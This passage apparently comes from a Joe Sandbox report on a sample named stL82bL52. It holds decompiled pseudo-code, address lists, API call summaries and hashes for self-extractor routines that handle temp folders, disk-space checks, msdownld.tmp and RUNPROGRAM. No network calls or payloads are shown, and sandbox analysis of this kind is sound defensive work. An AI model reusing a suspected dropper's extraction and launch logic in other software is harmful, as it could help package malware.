                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0x1f8b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E001F5467(0x1f8b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E001F44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E001F6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x001f55ab
                                                                                                                                                                                                        0x001f55b2
                                                                                                                                                                                                        0x001f55c9
                                                                                                                                                                                                        0x001f55d5
                                                                                                                                                                                                        0x001f55d9
                                                                                                                                                                                                        0x001f5600
                                                                                                                                                                                                        0x001f5605
                                                                                                                                                                                                        0x001f560a
                                                                                                                                                                                                        0x001f560c
                                                                                                                                                                                                        0x001f5638
                                                                                                                                                                                                        0x001f5641
                                                                                                                                                                                                        0x001f5643
                                                                                                                                                                                                        0x001f5645
                                                                                                                                                                                                        0x001f5645
                                                                                                                                                                                                        0x001f564c
                                                                                                                                                                                                        0x001f5652
                                                                                                                                                                                                        0x001f5657
                                                                                                                                                                                                        0x001f5659
                                                                                                                                                                                                        0x001f5696
                                                                                                                                                                                                        0x001f569c
                                                                                                                                                                                                        0x001f589f
                                                                                                                                                                                                        0x001f58a7
                                                                                                                                                                                                        0x001f58ac
                                                                                                                                                                                                        0x001f58b3
                                                                                                                                                                                                        0x001f58b5
                                                                                                                                                                                                        0x001f56a2
                                                                                                                                                                                                        0x001f56a2
                                                                                                                                                                                                        0x001f56a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f56ae
                                                                                                                                                                                                        0x001f56ae
                                                                                                                                                                                                        0x001f56b9
                                                                                                                                                                                                        0x001f56bf
                                                                                                                                                                                                        0x001f56c1
                                                                                                                                                                                                        0x001f56f3
                                                                                                                                                                                                        0x001f56f3
                                                                                                                                                                                                        0x001f5705
                                                                                                                                                                                                        0x001f570a
                                                                                                                                                                                                        0x001f5711
                                                                                                                                                                                                        0x001f5717
                                                                                                                                                                                                        0x001f5724
                                                                                                                                                                                                        0x001f5726
                                                                                                                                                                                                        0x001f5729
                                                                                                                                                                                                        0x001f5730
                                                                                                                                                                                                        0x001f5737
                                                                                                                                                                                                        0x001f573d
                                                                                                                                                                                                        0x001f5740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f572b
                                                                                                                                                                                                        0x001f572b
                                                                                                                                                                                                        0x001f572e
                                                                                                                                                                                                        0x001f5742
                                                                                                                                                                                                        0x001f5742
                                                                                                                                                                                                        0x001f5745
                                                                                                                                                                                                        0x001f576b
                                                                                                                                                                                                        0x001f576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5747
                                                                                                                                                                                                        0x001f5747
                                                                                                                                                                                                        0x001f574d
                                                                                                                                                                                                        0x001f574f
                                                                                                                                                                                                        0x001f5771
                                                                                                                                                                                                        0x001f5771
                                                                                                                                                                                                        0x001f5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5751
                                                                                                                                                                                                        0x001f5751
                                                                                                                                                                                                        0x001f5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5755
                                                                                                                                                                                                        0x001f575b
                                                                                                                                                                                                        0x001f5760
                                                                                                                                                                                                        0x001f5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5764
                                                                                                                                                                                                        0x001f5764
                                                                                                                                                                                                        0x001f5769
                                                                                                                                                                                                        0x001f577e
                                                                                                                                                                                                        0x001f577e
                                                                                                                                                                                                        0x001f5781
                                                                                                                                                                                                        0x001f5788
                                                                                                                                                                                                        0x001f578d
                                                                                                                                                                                                        0x001f578f
                                                                                                                                                                                                        0x001f57b2
                                                                                                                                                                                                        0x001f57b8
                                                                                                                                                                                                        0x001f57bd
                                                                                                                                                                                                        0x001f57bf
                                                                                                                                                                                                        0x001f57cd
                                                                                                                                                                                                        0x001f57cd
                                                                                                                                                                                                        0x001f57dd
                                                                                                                                                                                                        0x001f57e3
                                                                                                                                                                                                        0x001f57ef
                                                                                                                                                                                                        0x001f57f5
                                                                                                                                                                                                        0x001f57f8
                                                                                                                                                                                                        0x001f580a
                                                                                                                                                                                                        0x001f580a
                                                                                                                                                                                                        0x001f57fa
                                                                                                                                                                                                        0x001f5802
                                                                                                                                                                                                        0x001f5802
                                                                                                                                                                                                        0x001f580d
                                                                                                                                                                                                        0x001f580f
                                                                                                                                                                                                        0x001f5830
                                                                                                                                                                                                        0x001f5836
                                                                                                                                                                                                        0x001f583d
                                                                                                                                                                                                        0x001f584b
                                                                                                                                                                                                        0x001f5851
                                                                                                                                                                                                        0x001f5855
                                                                                                                                                                                                        0x001f585a
                                                                                                                                                                                                        0x001f585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f585e
                                                                                                                                                                                                        0x001f585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f585e
                                                                                                                                                                                                        0x001f5811
                                                                                                                                                                                                        0x001f5817
                                                                                                                                                                                                        0x001f5819
                                                                                                                                                                                                        0x001f581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f581f
                                                                                                                                                                                                        0x001f5791
                                                                                                                                                                                                        0x001f5797
                                                                                                                                                                                                        0x001f579c
                                                                                                                                                                                                        0x001f579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f57a0
                                                                                                                                                                                                        0x001f57a9
                                                                                                                                                                                                        0x001f57ae
                                                                                                                                                                                                        0x001f57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f57b0
                                                                                                                                                                                                        0x001f579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5769
                                                                                                                                                                                                        0x001f5762
                                                                                                                                                                                                        0x001f5753
                                                                                                                                                                                                        0x001f574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5864
                                                                                                                                                                                                        0x001f5864
                                                                                                                                                                                                        0x001f5864
                                                                                                                                                                                                        0x001f5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f56c3
                                                                                                                                                                                                        0x001f56c5
                                                                                                                                                                                                        0x001f56c9
                                                                                                                                                                                                        0x001f56ce
                                                                                                                                                                                                        0x001f56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f56d6
                                                                                                                                                                                                        0x001f56d6
                                                                                                                                                                                                        0x001f56d8
                                                                                                                                                                                                        0x001f56dd
                                                                                                                                                                                                        0x001f56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f56e1
                                                                                                                                                                                                        0x001f56e2
                                                                                                                                                                                                        0x001f56e4
                                                                                                                                                                                                        0x001f56e6
                                                                                                                                                                                                        0x001f56eb
                                                                                                                                                                                                        0x001f56ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f56f3
                                                                                                                                                                                                        0x001f56f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f586c
                                                                                                                                                                                                        0x001f5878
                                                                                                                                                                                                        0x001f587e
                                                                                                                                                                                                        0x001f5882
                                                                                                                                                                                                        0x001f5883
                                                                                                                                                                                                        0x001f5889
                                                                                                                                                                                                        0x001f588e
                                                                                                                                                                                                        0x001f588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5896
                                                                                                                                                                                                        0x001f56ed
                                                                                                                                                                                                        0x001f56df
                                                                                                                                                                                                        0x001f56d0
                                                                                                                                                                                                        0x001f56c1
                                                                                                                                                                                                        0x001f56a8
                                                                                                                                                                                                        0x001f565b
                                                                                                                                                                                                        0x001f565b
                                                                                                                                                                                                        0x001f565d
                                                                                                                                                                                                        0x001f5669
                                                                                                                                                                                                        0x001f5669
                                                                                                                                                                                                        0x001f565f
                                                                                                                                                                                                        0x001f565f
                                                                                                                                                                                                        0x001f5665
                                                                                                                                                                                                        0x001f5667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5667
                                                                                                                                                                                                        0x001f566c
                                                                                                                                                                                                        0x001f5673
                                                                                                                                                                                                        0x001f5678
                                                                                                                                                                                                        0x001f567a
                                                                                                                                                                                                        0x001f589b
                                                                                                                                                                                                        0x001f589b
                                                                                                                                                                                                        0x001f5680
                                                                                                                                                                                                        0x001f5685
                                                                                                                                                                                                        0x001f568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f568c
                                                                                                                                                                                                        0x001f567a
                                                                                                                                                                                                        0x001f560e
                                                                                                                                                                                                        0x001f5613
                                                                                                                                                                                                        0x001f561a
                                                                                                                                                                                                        0x001f5620
                                                                                                                                                                                                        0x001f5626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5626
                                                                                                                                                                                                        0x001f55db
                                                                                                                                                                                                        0x001f55e0
                                                                                                                                                                                                        0x001f55e7
                                                                                                                                                                                                        0x001f55f1
                                                                                                                                                                                                        0x001f55f6
                                                                                                                                                                                                        0x001f55f6
                                                                                                                                                                                                        0x001f55f6
                                                                                                                                                                                                        0x001f58b7
                                                                                                                                                                                                        0x001f58c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001F55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 001F5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 001F564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001F5620
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 001F571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 001F5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001F57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001F57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 001F5802
                                                                                                                                                                                                          • Part of subcall function 001F2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 001F2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 001F5830
                                                                                                                                                                                                          • Part of subcall function 001F6517: FindResourceA.KERNEL32(001F0000,000007D6,00000005), ref: 001F652A
                                                                                                                                                                                                          • Part of subcall function 001F6517: LoadResource.KERNEL32(001F0000,00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001F6538
                                                                                                                                                                                                          • Part of subcall function 001F6517: DialogBoxIndirectParamA.USER32(001F0000,00000000,00000547,001F19E0,00000000), ref: 001F6557
                                                                                                                                                                                                          • Part of subcall function 001F6517: FreeResource.KERNEL32(00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001F6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 001F5878
                                                                                                                                                                                                          • Part of subcall function 001F597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001F59A8
                                                                                                                                                                                                          • Part of subcall function 001F597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001F59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-2610921595
                                                                                                                                                                                                        • Opcode ID: 16c06dc42ea2e0263095a4e8101e9e812e1b141fdc49391aa734674d264cba8d
                                                                                                                                                                                                        • Instruction ID: 9632e817a6e0767b76d9f0eab11aa51ef0a1ac3562a48dacd092fe8b42ebda1d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16c06dc42ea2e0263095a4e8101e9e812e1b141fdc49391aa734674d264cba8d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48814CB0A04A0CABDB24AB719C41BFE766F9F60350F440165F78AE2591EF748DC2CA60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 1f597d-1f59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1f59dd-1f5a1b GetDiskFreeSpaceA 324->325 326 1f59bb-1f59d8 call 1f44b9 call 1f6285 324->326 328 1f5ba1-1f5bde memset call 1f6285 GetLastError FormatMessageA 325->328 329 1f5a21-1f5a4a MulDiv 325->329 343 1f5c05-1f5c14 call 1f6ce0 326->343 339 1f5be3-1f5bfc call 1f44b9 SetCurrentDirectoryA 328->339 329->328 332 1f5a50-1f5a6c GetVolumeInformationA 329->332 335 1f5a6e-1f5ab0 memset call 1f6285 GetLastError FormatMessageA 332->335 336 1f5ab5-1f5aca SetCurrentDirectoryA 332->336 335->339 337 1f5acc-1f5ad1 336->337 341 1f5ad3-1f5ad8 337->341 342 1f5ae2-1f5ae4 337->342 351 1f5c02 339->351 341->342 346 1f5ada-1f5ae0 341->346 348 1f5ae7-1f5af8 342->348 349 1f5ae6 342->349 346->337 346->342 353 1f5af9-1f5afb 348->353 349->348 354 1f5c04 351->354 355 1f5afd-1f5b03 353->355 356 1f5b05-1f5b08 353->356 354->343 355->353 355->356 357 1f5b0a-1f5b1b call 1f44b9 356->357 358 1f5b20-1f5b27 356->358 357->351 360 1f5b29-1f5b33 358->360 361 1f5b52-1f5b5b 358->361 360->361 364 1f5b35-1f5b50 360->364 362 1f5b62-1f5b6d 361->362 365 1f5b6f-1f5b74 362->365 366 1f5b76-1f5b7d 362->366 364->362 367 1f5b85 365->367 368 1f5b7f-1f5b81 366->368 369 1f5b83 366->369 370 1f5b87-1f5b94 call 1f268b 367->370 371 1f5b96-1f5b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E001F597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E001F44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0x1f9a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0x1f9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0x1f9a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0x1f89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0x1f9124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t66 = E001F268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0x1f9a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0x1f89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1f89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0x1f9a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E001F44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E001F44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E001F6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x001f597d
                                                                                                                                                                                                        0x001f5988
                                                                                                                                                                                                        0x001f598f
                                                                                                                                                                                                        0x001f599a
                                                                                                                                                                                                        0x001f59a6
                                                                                                                                                                                                        0x001f59a8
                                                                                                                                                                                                        0x001f59af
                                                                                                                                                                                                        0x001f59b9
                                                                                                                                                                                                        0x001f59dd
                                                                                                                                                                                                        0x001f59e4
                                                                                                                                                                                                        0x001f59f1
                                                                                                                                                                                                        0x001f59fe
                                                                                                                                                                                                        0x001f5a0b
                                                                                                                                                                                                        0x001f5a13
                                                                                                                                                                                                        0x001f5a19
                                                                                                                                                                                                        0x001f5a1b
                                                                                                                                                                                                        0x001f5ba1
                                                                                                                                                                                                        0x001f5baf
                                                                                                                                                                                                        0x001f5bbd
                                                                                                                                                                                                        0x001f5bd8
                                                                                                                                                                                                        0x001f5bde
                                                                                                                                                                                                        0x001f5be3
                                                                                                                                                                                                        0x001f5bec
                                                                                                                                                                                                        0x001f5bf0
                                                                                                                                                                                                        0x001f5bfc
                                                                                                                                                                                                        0x001f5c02
                                                                                                                                                                                                        0x001f5c02
                                                                                                                                                                                                        0x001f5c02
                                                                                                                                                                                                        0x001f5c04
                                                                                                                                                                                                        0x001f5c04
                                                                                                                                                                                                        0x00000000
